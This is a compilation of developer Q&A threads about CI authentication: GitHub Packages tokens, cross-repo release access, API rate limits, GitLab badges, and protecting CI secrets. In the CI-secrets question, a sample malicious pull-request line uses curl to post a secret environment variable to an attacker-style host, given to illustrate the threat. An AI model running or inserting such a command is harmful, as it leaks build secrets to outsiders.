Use Github Package Registry without authtoken - github

In my node project I would like to use both NPM and Github registries. The reason is that I use some packages such as request or async, but I've made my own packages which are stored on GitHub Packages Registry.
I've tried to add #USERNAME:registry=https://npm.pkg.github.com/ in .npmrc, but I still need an authtoken. There is the problem: as it's for a continuous integration I don't want to use a token linked to a specific user.
So what could I do?
Edit: I'm using Circle CI for my workflows.

You can use the default GITHUB_TOKEN associated with the repository that your workflow runs in.
If you are using a GitHub Actions workflow, you can use a GITHUB_TOKEN to publish and consume packages in the GitHub Package Registry without needing to store and manage a personal access token.
ref: https://help.github.com/en/github/managing-packages-with-github-package-registry/configuring-npm-for-use-with-github-package-registry#authenticating-to-github-package-registry
If you are not using GitHub Actions and are running your build in a different CI tool, then I don't think you have any choice but to use a Personal Access Token tied to a user account.

Related

GitHub Actions: Downloading release files from a different repository

I have Repo A (private, in an organization), which has a GitHub Actions workflow that builds and bundles my application into a tar.gz file and includes it as an artifact in a Release.
I have Repo B (also private, same organization) which, in the GitHub Actions workflow, needs to download the release artifacts from a specific release of Repo A, and do other things with it.
What is the modern best-practices approach to enabling this cross-repo release access within an organization? Last time I did this, we had to use a Personal Access Token for a machine user that we created, which is all sorts of bad (machine user GitHub account, long-lived secret, etc.). GitHub has since added a lot of capability with the built-in GITHUB_TOKEN secret, with OIDC support within Actions, etc. Is there a better way to achieve what I'm trying to do?
If you are using a Linux Docker container, you can try and use dsaltares/fetch-gh-release-asset which is meant to:
downloads an asset from a GitHub release and provides some release details as output.
Private repos are supported.
You can find an example here.
But it does use a GitHub token which defaults to ${{ secrets.GITHUB_TOKEN }}: make sure it is a GitHub App installation access token.

Using github packages without personal access token?

The project I'm working on currently deploys our private node packages via github packages. Our current workflow is for each developer to create and maintain their own personal access token, and then we use a central account's PAT for automation in AWS.
I was wondering if it's possible to authenticate with github packages without the use of Actions or PAT's?
As of 2022-07-30
No, it is not possible to use github packages without a personal access token (PAT):
It is not possible to upload without a PAT (which makes sense as it prevents random people to upload binaries to your package repo);
It is not possible to download without a PAT (not even publicly available packages can be used);
As early as 2019-10-20, people have requested github to remove PATs as a requirement for mainly downloading public packages.
The idea is that users of libraries should not need to have a github account to access a developer's package.
Sadly, the request for PAT-less package downloads was not granted by Github to this day.
If you want a package registry without a hassle, it might be wise to look for other registries, such as MavenCentral or JitPack (not necessarily meant for node packages), or host a service yourself.
I even had to link a cached webpage, as the original question has been removed from Github community along with a bunch of related questions.
Another question on github, stating PAT-less access to packages is still on the roadmap for "fall 2021", is here.
I could not find what the current status of this feature is.
Edit: It is possible to download binaries without a PAT for public repositories using jitpack.io. Jitpack builds the given jar/aar on their servers.
You can add jitpack as a repository to your build system, and use the jitpack-specified URL to reference releases, branches, or specific commits.
Sadly, there is no way to refer to packages (yet).
However, this system allows your users to use your code without needing PATs nor a Github account.
I'd like to offer an alternative.
You may use a Gradle plugin of mine (magik, I was exactly in your shoes) to ease the consumption of artifacts from your Github Packages for Gradle clients.
It requires you to save your read-only PAT on the repo itself, so that the users don't have to deal with any authentication (apart from using the plugin mentioned above).

Overcoming GitHub API Rate-Limiting from a Public Project?

I have a public repository which is an Ansible role. This Ansible role uses the GitHub API in order to get the most recent release for a given repository. I use this metadata in order to then subsequently download the latest release binary for the given project.
Unfortunately, I'm hitting GitHub's API rate-limit when running my tests in Travis and occasionally on my local machine. Since this is a public-facing project, what are my options for overcoming this rate limit?
I could use some kind of secret management system in Ansible or expose the value via Travis environment variables, but is there a standard practice for dealing with these kinds of scenarios for public code?
Unauthenticated requests only get 60/hour. Authenticated requests get 5000/hour.
To authenticate, generate a personal API access token for use by the project. Put it either in an encrypted Travis environment variable or some other way to store encrypted secrets (for example, Rails has built-in encrypted credentials). Use that token to access the API.
Make a separate Github account for the project and use an API token for that. This avoids sharing its rate limit with anyone else.
Use Git commands on a local clone where possible. For example, if you want to look up a commit instead of doing it via the API, clone the repository and use normal Git commands. Cache the clones and git fetch periodically to keep them up to date.
Finally, make use of conditional requests. These use HTTP headers so you can safely use cached queries. These do not count against your rate limit. A good Github authentication library should have an option for caching.
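The conditional-request advice from the answer above, as an added example that is not part of the original answer: an ETag cache for the releases/latest endpoint, with the network call kept separate from the header and response logic so the latter can be exercised with constructed responses. The owner/repo names, the plain-dict cache and the token variable are assumptions.

```python
import json
import urllib.request
from urllib.error import HTTPError

API = "https://api.github.com"


def build_request(cache, owner, repo, token=None):
    """Build (url, headers) for GET /repos/{owner}/{repo}/releases/latest.
    If the cache already holds an ETag for this URL, send If-None-Match so an
    unchanged resource comes back as 304 Not Modified, which the answer above
    notes is not charged against the rate limit."""
    url = f"{API}/repos/{owner}/{repo}/releases/latest"
    headers = {"Accept": "application/vnd.github+json"}
    if token:  # supplied from an encrypted CI variable, never hard-coded
        headers["Authorization"] = f"Bearer {token}"
    if url in cache:
        headers["If-None-Match"] = cache[url]["etag"]
    return url, headers


def handle_response(cache, url, status, headers, body):
    """Update the cache from a response; return (release_json, remaining_quota)."""
    remaining = int(headers.get("X-RateLimit-Remaining", -1))
    if status == 304:                      # unchanged: serve the cached body
        return cache[url]["body"], remaining
    if status == 200:
        data = json.loads(body)
        if headers.get("ETag"):            # remember the validator for next time
            cache[url] = {"etag": headers["ETag"], "body": data}
        return data, remaining
    if status in (403, 429) and remaining == 0:
        raise RuntimeError("rate limit exhausted; resets at epoch "
                           + str(headers.get("X-RateLimit-Reset")))
    raise RuntimeError(f"unexpected HTTP status {status}")


def fetch_latest_release(cache, owner, repo, token=None):
    """Live helper (assumed usage): performs the conditional request over the network."""
    url, hdrs = build_request(cache, owner, repo, token)
    req = urllib.request.Request(url, headers=hdrs)
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return handle_response(cache, url, resp.getcode(), resp.headers, resp.read())
    except HTTPError as err:               # urllib raises for 304 and 4xx alike
        return handle_response(cache, url, err.code, err.headers, err.read())
```

Persist the cache dict to disk between CI runs (or cache the clone as the answer suggests) so the second and later lookups are free 304s.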

Prevent GitHub PR checks running without manual intervention

I have run into a situation where I have a repo on GitHub that I am looking to make public.
Currently, one of the PR checks runs CI tests on AWS CodeBuild.
Because of the nature of the tests, there are environment variables that contain secrets. The results/logs from the build output will not be public, which is one good thing.
AWS CodeBuild uses the buildspec.yml file to run commands in CI.
If I were to have an environment variable, for example $SECRET_THING, an attacker would be able to simply open a PR, adding to buildspec.yml, for example:
- curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
Which would then send themselves the secret.
Using either a setting in GitHub, the GitHub checks API or CodeBuild, is there a way that would require manual intervention to run the check, preferably after a code review? (eg. a button clickable only by an authorised collaborator on the PR page)
Don't use plain text environment variables; instead use "env > parameter-store" to store your secret. If you are using CodeBuild's console UI you can create the parameter store entry from "advanced > environment variables > type: parameter store" https://aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax
Also, CodeBuild allows you to define the buildspec as part of the project. This way the buildspec yml file is not present in your repository.
Note: CodeBuild only allows repo owner or admin to create the webhook.
Update: @Chris CodeBuild supports filter groups for PR builds. Documentation: https://docs.aws.amazon.com/codebuild/latest/userguide/sample-github-pull-request.html#sample-github-pull-request-filter-webhook-events-console. You can filter on the actor to ensure that only trusted collaborators can trigger a build for PR or push events.

Can Gitlab expose build and coverage badges to anonymous users?

We are hosting some repository on GitHub, some other on GitLab.
Sometimes, the package is published but not the source code.
We always display build status and code coverage in README.md.
Is there a way to have build and coverage badge on GitLab always accessible to anonymous?
Since release 11.4.8 of Gitlab it's not possible to expose a project's Badges through a Personal Access Token anymore, because of the change "Restrict Personal Access Tokens to API scope on web requests."
The commit that removed this "workaround" was published as a security fix.
An ongoing issue is currently being discussed to find another solution. Let's see how it goes.
That was followed by issue 13324
It includes:
FYI, I have a workaround for this using the GitLab API.
It assumes you have created a token in GitLab for a user (Note: That "user" needn't necessarily be Human - my use case is to display a badge on a dashboard hosted on a different VM).
<img src="https://<gitlab-uri>/<namespace>/<project>/badges/<branch>/build.svg?private_token=<token>">
Update Dec. 2018: This is no longer possible through a token (see Paul B.'s answer).
This is because of "Improper Enforcement of Token Scope":
The GitLab web interface was vulnerable to an authorization issue that allowed access to the web-UI as a user using their Personal Access Token (PAT) of any scope.
The issue is now mitigated in the latest release and is assigned CVE-2018-19569.
But...:
Updated: 2018-11-28: We have received reports that this change has impacted how repo files and job artifacts are downloaded for some users.
For instructions on how to do so through the API, please see our support issue.
And you also have a current workaround which repeats the API access:
It is possible to add the project avatar to the project repository with a particular filename (logo) and then this file will be used for the avatar. There is an example here:
https://gitlab.com/issue-reproduce/project-avatar-repo
You'll be able to retrieve the files through the Repository Files API:
https://docs.gitlab.com/ee/api/repository_files.html#get-file-from-repository
Example:
https://gitlab.com/api/v4/projects/issue-reproduce%2Fproject-avatar-repo/repository/files/logo.png?ref=master